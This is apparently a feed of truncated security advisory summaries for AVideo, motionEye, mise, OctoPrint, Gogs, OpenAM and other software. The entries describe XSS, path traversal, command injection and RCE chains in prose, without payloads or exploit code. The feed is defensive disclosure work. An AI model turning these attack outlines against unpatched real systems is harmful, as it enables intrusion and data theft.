GHSA-7CQP-7CFV-6C3Q AVideo Meet lugin: anonymous-to-admin stored XSS via unescaped participant User-Agent in getMeetInfo.json.php Participants panel

Summary The Meet plugin stores the raw HTTP User-Agent header of every meeting participant and later renders it without output encoding in the meeting-management "Participants" panel that the meeting host and site administrators open. An anonymous, unauthenticated attacker can join any public...

GHSA-PHV5-334H-MXCW motionEye Partial Authentication Bypass: Unauthenticated Admin Credential Theft via Path Traversal

Partial Authentication Bypass: Unauthenticated Admin Credential Theft via Path Traversal Summary Myself and others have reported several RCE vulnerabilities to this project. However, due to the nature of the app, these are largely not of all that much value, as there is built-in functionality to...

GHSA-QXVG-H7Q2-HCXH motionEye: LFI → pass‑the‑hash admin → unsafe restore → unauth action exec (RCE)

Summary A multi‑stage chain in motionEye leads to remote code execution. The chain combines: 1. Arbitrary file read LFI via the picture download endpoint for local motion cameras using absolute paths. 2. Pass‑the‑hash admin auth due to accepting request signatures computed with password hashes. 3...

GHSA-J67X-Q29F-QCVV motionEye's missing authentication on ActionHandler allows unauthenticated camera action execution

Summary The ActionHandler.post method in motionEye has no authentication decorator, allowing any unauthenticated attacker to trigger camera actions including snapshots, recording start/stop, and configured action scripts PTZ controls, alarm triggers, etc.. Vulnerability Details File:...

GHSA-RW9Q-97R9-8GVH motionEye's Absolute Path Traversal in Media File Handlers Allows Arbitrary File Read

Summary mEye contains an absolute path traversal vulnerability in multiple media file handlers that allows an attacker to read arbitrary files from the filesystem. The affected handlers accept a user-controlled filename parameter and construct filesystem paths using os.path.join. When an absolute...

GHSA-29HF-RM4X-XXPH Mise's local credential_command executes untrusted config

Summary mise loads github.credentialcommand from local project config before any trust decision, then executes that value with sh -c when resolving a GitHub token. An attacker who can place a .mise.toml in a repository can execute arbitrary shell commands when the victim runs a GitHub-related mis...

GHSA-77G9-363W-RCCQ Mise vulnerable to arbitrary command execution via task-include files in an untrusted, config-less repository

Summary mise's trust feature gates config files mise.toml, .tool-versions through trustcheck, but task-include files are loaded on a path that never reaches it. When a directory has a task-include dir mise-tasks/, .mise/tasks/, … but no config file, mise falls back to the default includes and...

EEF-CVE-2026-55736 Private action arguments can be set by user input in Ash

Summary Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability in ash-project ash allows a user to set the value of a private action argument that is intended to be controlled only by trusted server-side code. Action arguments declared with public?: false are...

GHSA-F94H-J2QG-FXW3 mise HTTP backend uses raw version path for install symlink destination

Summary The mise HTTP backend builds its install symlink destination from the raw resolved version string for non-latest versions. Normal tool install paths use the sanitized version pathname, but the HTTP backend's symlink path uses the raw value. On Unix-like systems, if that version is an...

GHSA-J4H9-PM27-4RFW OctoPrint has possible file exfiltration via query parameters on upload endpoints

Impact OctoPrint versions up until and including 1.11.7 as well as 2.0.0rc1 and 2.0.0rc2 contain a vulnerability that allows an attacker with the FILEUPLOAD permission to exfiltrate files from the host that OctoPrint has read access to, by moving them into the upload folder where they then can be...

RLSA-2026:28208 Important: postgresql:13 security update

PostgreSQL is an advanced object-relational database management system DBMS. Security Fixes: postgresql: PostgreSQL: Credential recovery via covert timing channel in MD5 password comparison CVE-2026-6478 For more details about the security issues, including the impact, a CVSS score,...

GHSA-3VWC-QWHC-3MJ7 Glances has arbitrary file write and command execution via `secure_popen` redirection and chaining operators in AMP command configuration

Summary The securepopen function in glances/secure.py interprets file redirection, | pipe, and && command chaining operators in command strings. These operators are applied without any validation on the target file path, piped command, or chained command. When Application Monitoring Process AMP...

ROOT-APP-NPM-CVE-2026-44576 CVE-2026-44576 in @rootio/next - Patched by Root

Root has patched CVE-2026-44576 in the @rootio/next package for Root:npm. Multiple fixed versions available...

ROOT-APP-NPM-CVE-2026-44572 CVE-2026-44572 in @rootio/next - Patched by Root

Root has patched CVE-2026-44572 in the @rootio/next package for Root:npm. Multiple fixed versions available...

ROOT-APP-NPM-CVE-2026-45109 CVE-2026-45109 in @rootio/next - Patched by Root

Root has patched CVE-2026-45109 in the @rootio/next package for Root:npm. Multiple fixed versions available...

ROOT-APP-NPM-CVE-2026-44577 CVE-2026-44577 in @rootio/next - Patched by Root

Root has patched CVE-2026-44577 in the @rootio/next package for Root:npm. Multiple fixed versions available...

ROOT-APP-NPM-CVE-2026-44573 CVE-2026-44573 in @rootio/next - Patched by Root

Root has patched CVE-2026-44573 in the @rootio/next package for Root:npm. Multiple fixed versions available...

ROOT-APP-NPM-GHSA-8H8Q-6873-Q5FJ GHSA-8h8q-6873-q5fj in @rootio/next - Patched by Root

Root has patched GHSA-8h8q-6873-q5fj in the @rootio/next package for Root:npm. Multiple fixed versions available...

ROOT-APP-NPM-CVE-2026-44575 CVE-2026-44575 in @rootio/next - Patched by Root

Root has patched CVE-2026-44575 in the @rootio/next package for Root:npm. Multiple fixed versions available...

ROOT-APP-NPM-CVE-2026-44574 CVE-2026-44574 in @rootio/next - Patched by Root

Root has patched CVE-2026-44574 in the @rootio/next package for Root:npm. Multiple fixed versions available...

ROOT-APP-NPM-CVE-2026-44581 CVE-2026-44581 in @rootio/next - Patched by Root

Root has patched CVE-2026-44581 in the @rootio/next package for Root:npm. Multiple fixed versions available...

ROOT-APP-NPM-CVE-2026-44580 CVE-2026-44580 in @rootio/next - Patched by Root

Root has patched CVE-2026-44580 in the @rootio/next package for Root:npm. Multiple fixed versions available...

ROOT-APP-NPM-CVE-2026-44579 CVE-2026-44579 in @rootio/next - Patched by Root

Root has patched CVE-2026-44579 in the @rootio/next package for Root:npm. Multiple fixed versions available...

ROOT-APP-NPM-CVE-2026-44578 CVE-2026-44578 in @rootio/next - Patched by Root

Root has patched CVE-2026-44578 in the @rootio/next package for Root:npm. Multiple fixed versions available...

ROOT-APP-NPM-CVE-2026-44582 CVE-2026-44582 in @rootio/next - Patched by Root

Root has patched CVE-2026-44582 in the @rootio/next package for Root:npm. Multiple fixed versions available...

GHSA-8QV3-P479-CJ62 Budibase has nonymous NoSQL operator injection via published-app query templates

Summary enrichContext at packages/server/src/sdk/workspace/queries/queries.ts:121-138 substitutes parameter values into the raw JSON body of a query, then JSON.parses the result. The validator validateQueryInputs at packages/server/src/api/controllers/query/index.ts:61-71 rejects only Handlebars...

GHSA-WC3F-XC32-435F AVideo has an incomplete fix of CVE-2026-33482: sanitizeFFmpegCommand still allows a single '&' (background operator), giving OS command execution at the same execAsync sh -c sink

Summary The fix for CVE-2026-33482 GHSA-pmj8-r2j7-xg6c is incomplete. That advisory reported that sanitizeFFmpegCommand plugin/API/standAlone/functions.php failed to strip $... command substitution, allowing OS command injection at the execAsync sh -c sink. The fix commit 25c8ab90 added $, , , , ...

GHSA-3W28-36P9-W929 Gogs's Unauthenticated Jupyter Notebook (ipynb) Sanitizer allows arbitrary data: URIs leading to XSS

Summary The Jupyter Notebook ipynb sanitizer endpoint at POST /-/api/sanitizeipynb allows arbitrary data: URIs without proper restrictions, potentially leading to Cross-Site Scripting XSS. The endpoint uses bluemonday.UGCPolicy with p.AllowURLSchemes"data" which permits all data URI schemes...

GHSA-R9PV-5RPP-VM8G OpenAM Unauthenticated Session Hijacking via Information Exposure in CDCServlet

Summary Description An Information Exposure Through Sent Data CWE-201 issue in OpenAM's Cross-Domain Single Sign-On CDSSO servlet allows a logged-in user's raw OpenAM session token to be POSTed to an attacker-controlled URL. This impacts OpenAM Community Edition through version 16.0.6. This issue...

GHSA-VVHJ-W2JQ-263Q OpenAM Authenticated Privilege Escalation via Raw Token Disclosure Session RPC

Summary Description An insufficient authorization CWE-285 and information exposure CWE-200 issue in OpenAM's session management endpoint allows a low-privileged authenticated user to retrieve active session credentials belonging to other users, including those with higher privileges. This affects...

ROOT-APP-MAVEN-CVE-2026-45292 CVE-2026-45292 in io.root.io.opentelemetry:opentelemetry-api - Patched by Root

Root has patched CVE-2026-45292 in the io.root.io.opentelemetry:opentelemetry-api package for Root:Maven. Multiple fixed versions available...

GHSA-P6QX-GHXM-389H OctoPrint has XSS in its Suppressed Command Notifications

Impact OctoPrint versions up to and including 1.11.7 as well as 2.0.0rc1 and 2.0.0rc2 are affected by a vulnerability that allows injection of arbitrary HTML and JavaScript into Suppressed Command notifications popups generated by the printer. An attacker who successfully convinces a victim to...

GHSA-744X-3838-5R56 Gogs Vulnerable to Unauthenticated Organization Teams Information Disclosure via API

Summary Gogs has an unauthenticated information disclosure vulnerability. The GET /api/v1/orgs/:orgname/teams endpoint at internal/route/api/v1/orgteam.go:8 returns all teams for any organization without requiring authentication. The route group at internal/route/api/v1/api.go:380-385 lacks the...

GHSA-XP79-5MX3-JX52 Gogs has Unauthenticated Asymmetric Denial of Service (DoS) via SSH Handshake Stall (File Descriptor Exhaustion)

The Gogs built-in Go SSH server is vulnerable to an unauthenticated, asymmetric Denial of Service DoS attack. The application accepts inbound TCP connections and passes them to golang.org/x/crypto/ssh.NewServerConn inside a new goroutine without enforcing any read/write deadlines on the underlyin...

GHSA-C39W-43GM-34H5 Gogs has Path Traversal in organization name that results in RCE through Git hooks

Summary Organization names containing path traversal sequences ../ are accepted by Gogs, and repositories under them are written to paths following these path traversals. This allows storing/retrieving data for repositories at arbitrary locations on the filesystem. By creating nested structure of...

GHSA-6P9M-Q3JP-47H4 Gogs: LFS dedupe path leaks private repo content across tenants

Summary Git LFS storage is content-addressed by OID alone /// but per-repo authorization lives in the lfsobject table keyed repoid, oid. serveUpload skips re-uploading when the OID file already exists on disk and inserts a new repoid, oid row pointing at it without verifying the request body hash...

GHSA-89MR-XQFV-758M Gogs: UploadRepoFiles writes outside repo working tree via committed parent sym

Summary Repository.UploadRepoFiles checks for symlinks only on the leaf of the upload target osx.IsSymlinktargetPath. The siblings UpdateRepoFile, DeleteRepoFile, and GetDiffPreview use hasSymlinkInPath, which lstats every component — UploadRepoFiles is the lone outlier. An attacker with repo-wri...

ROOT-APP-MAVEN-CVE-2026-34197 CVE-2026-34197 in io.root.org.apache.activemq:activemq-broker - Patched by Root

Root has patched CVE-2026-34197 in the io.root.org.apache.activemq:activemq-broker package for Root:Maven. Multiple fixed versions available...

ROOT-APP-MAVEN-CVE-2025-27533 CVE-2025-27533 in io.root.org.apache.activemq:activemq-openwire-legacy - Patched by Root

Root has patched CVE-2025-27533 in the io.root.org.apache.activemq:activemq-openwire-legacy package for Root:Maven. Multiple fixed versions available...

ROOT-APP-MAVEN-CVE-2025-66168 CVE-2025-66168 in io.root.org.apache.activemq:activemq-mqtt - Patched by Root

Root has patched CVE-2025-66168 in the io.root.org.apache.activemq:activemq-mqtt package for Root:Maven. Multiple fixed versions available...

ROOT-APP-MAVEN-CVE-2026-41043 CVE-2026-41043 in io.root.org.apache.activemq:activemq-broker - Patched by Root

Root has patched CVE-2026-41043 in the io.root.org.apache.activemq:activemq-broker package for Root:Maven. Multiple fixed versions available...

ROOT-APP-MAVEN-CVE-2026-39304 CVE-2026-39304 in io.root.org.apache.activemq:activemq-client - Patched by Root

Root has patched CVE-2026-39304 in the io.root.org.apache.activemq:activemq-client package for Root:Maven. Multiple fixed versions available...

ROOT-APP-MAVEN-CVE-2026-41044 CVE-2026-41044 in io.root.org.apache.activemq:activemq-broker - Patched by Root

Root has patched CVE-2026-41044 in the io.root.org.apache.activemq:activemq-broker package for Root:Maven. Multiple fixed versions available...

ROOT-APP-MAVEN-CVE-2026-40466 CVE-2026-40466 in io.root.org.apache.activemq:activemq-all - Patched by Root

Root has patched CVE-2026-40466 in the io.root.org.apache.activemq:activemq-all package for Root:Maven. Multiple fixed versions available...

ROOT-APP-MAVEN-CVE-2026-33227 CVE-2026-33227 in io.root.org.apache.activemq:activemq-client - Patched by Root

Root has patched CVE-2026-33227 in the io.root.org.apache.activemq:activemq-client package for Root:Maven. Multiple fixed versions available...

ROOT-APP-MAVEN-CVE-2026-40046 CVE-2026-40046 in io.root.org.apache.activemq:activemq-all - Patched by Root

Root has patched CVE-2026-40046 in the io.root.org.apache.activemq:activemq-all package for Root:Maven. Multiple fixed versions available...

GHSA-WMFG-5P4H-5FW3 Gogs allows users to write to readonly repositories using receive-pack + service=git-upload-pack confusion

Summary Git smart HTTP authorizes POST …/git-receive-pack using the client-supplied service query string so ?service=git-upload-pack is evaluated as read access while routing still runs git receive-pack, allowing push where only read should be allowed. Details Gogs' Git Smart HTTP handler for...

GHSA-5C3F-6486-3G7G Gogs's password-reset tokens use account-activation lifetime, ignoring RESET_PASSWORD_CODE_LIVES

Summary Password-reset tokens are generated using conf.Auth.ActivateCodeLives the account-activation lifetime, not conf.Auth.ResetPasswordCodeLives. The token lifetime is baked into the token itself at generation time and is re-extracted from the token at verification time, making...

GHSA-268J-37XF-PP52 Gogs's write-level collaborators can mutate admin-only repository settings via API

Summary Three API endpoints — PATCH /api/v1/repos/:owner/:repo/issue-tracker, PATCH /api/v1/repos/:owner/:repo/wiki, and POST /api/v1/repos/:owner/:repo/mirror-sync — are gated by reqRepoWriter rather than reqRepoAdmin. The equivalent operations in the web UI sit behind reqRepoAdmin, which requir...

GHSA-VCM5-GVMP-78MP Gogs has DOM-based XSS via Milestone Name on New Issue Page

Summary The fix for GHSA-vgjm-2cpf-4g7c DOM-based XSS via milestone selection was only applied to templates/repo/issue/viewcontent.tmpl but not to templates/repo/issue/newform.tmpl. An attacker can store an HTML/JavaScript payload in a milestone name, and when any user opens the New Issue page an...